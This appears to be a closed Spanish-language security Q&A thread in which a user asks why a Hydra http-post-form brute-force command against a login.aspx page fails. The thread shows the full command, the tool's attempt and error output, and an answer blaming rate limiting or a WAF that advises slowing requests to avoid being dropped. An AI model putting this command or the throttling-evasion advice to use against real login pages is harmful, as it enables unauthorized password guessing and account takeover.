página web de fuerza bruta usando Hydra [cerrado]

Navega tus respuestas
0

¿Cuál es el problema en este comando para Hydra? Devuelve estos errores:

Comando: 

hydra -l 950421521 -P /home/jarvis/Desktop/ams-2.lst 172.20.10.4 http-post-form "/login.aspx:&txtUserName=^USER^&txtPassword=^PASS^&LoginButton=Login:Login failed" -V

Errores: 

[DATA] max 16 tasks per 1 server, overall 64 tasks, 100 login tries (l:1/p:100), ~0 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726000" - 1 of 100 [child 0] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726001" - 2 of 100 [child 1] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726002" - 3 of 100 [child 2] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726003" - 4 of 100 [child 3] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726004" - 5 of 100 [child 4] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726005" - 6 of 100 [child 5] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726006" - 7 of 100 [child 6] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726007" - 8 of 100 [child 7] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726008" - 9 of 100 [child 8] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726009" - 10 of 100 [child 9] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726010" - 11 of 100 [child 10] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726011" - 12 of 100 [child 11] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726012" - 13 of 100 [child 12] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726013" - 14 of 100 [child 13] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726014" - 15 of 100 [child 14] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726015" - 16 of 100 [child 15] (0/0)
[ERROR] Child with pid 4712 terminating, cannot connect
[ERROR] Child with pid 4713 terminating, cannot connect
[ERROR] Child with pid 4714 terminating, cannot connect
[ERROR] Child with pid 4715 terminating, cannot connect
[ERROR] Child with pid 4716 terminating, cannot connect
[ERROR] Child with pid 4717 terminating, cannot connect
[RE-ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726000" - 16 of 101 [child 0] (0/1)
[ERROR] Child with pid 4718 terminating, cannot connect
[ERROR] Child with pid 4719 terminating, cannot connect
[ERROR] Child with pid 4720 terminating, cannot connect
[ERROR] Child with pid 4721 terminating, cannot connect
[ERROR] Child with pid 4722 terminating, cannot connect
[ERROR] Child with pid 4723 terminating, cannot connect
[ERROR] Child with pid 4724 terminating, cannot connect
[ERROR] Child with pid 4725 terminating, cannot connect
[RE-ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726001" - 16 of 104 [child 1] (0/4)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726016" - 17 of 104 [child 2] (0/4)
[ERROR] Child with pid 4726 terminating, cannot connect
[ERROR] Child with pid 4727 terminating, cannot connect
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726017" - 18 of 112 [child 3] (0/12)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726018" - 19 of 112 [child 4] (0/12)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726019" - 20 of 112 [child 5] (0/12)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726020" - 21 of 114 [child 6] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726021" - 22 of 114 [child 7] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726022" - 23 of 114 [child 8] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726023" - 24 of 114 [child 9] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726024" - 25 of 114 [child 10] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726025" - 26 of 114 [child 11] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726026" - 27 of  114 [child 12] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726027" - 28 of 114 [child 13] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726028" - 29 of 114 [child 14] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726029" - 30 of 114 [child 15] (0/14)
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

Y pruebo estos comandos, ninguno de ellos funciona: 

$ hydra -l 950421521 -P /home/jarvis/Desktop/ams-2.lst -s 172.20.10.4 http-post-form "/login.aspx:&txtUserName=^USER^&txtPassword=^PASS^&LoginButton=Login:Login failed" -V
    
pregunta JARVISAI 11.01.2017 - 07:31
fuente

1 respuesta

1
  

[ERROR] Hijo con pid 4712 terminando, no se puede conectar

Eso generalmente significa que el sitio dejó de aceptar las conexiones HTTP de usted; podría ser que es:

  • La respuesta es demasiado lenta, y la hidra se está agotando.
  • El servidor está sobrecargado y falla, la hidra se está agotando.
  • (lo más probable) un WAF / firewall está limitando sus solicitudes ya que está sobrecargando el servicio.

Probablemente sea mejor escribir un script rápido que pruebe estos (Hydra tiene una tasa más alta de falsos positivos cuando realiza inicios de sesión de formularios) y reduce un poco la velocidad; encuentre el punto ideal antes de que empiece a descartar sus solicitudes.

    
respondido por el ndrix 11.01.2017 - 07:57
fuente

Lea otras preguntas en las etiquetas

Lattice vs Level con respecto al control de acceso Derivación de claves de sesión de master_secrets durante la reanudación de la sesión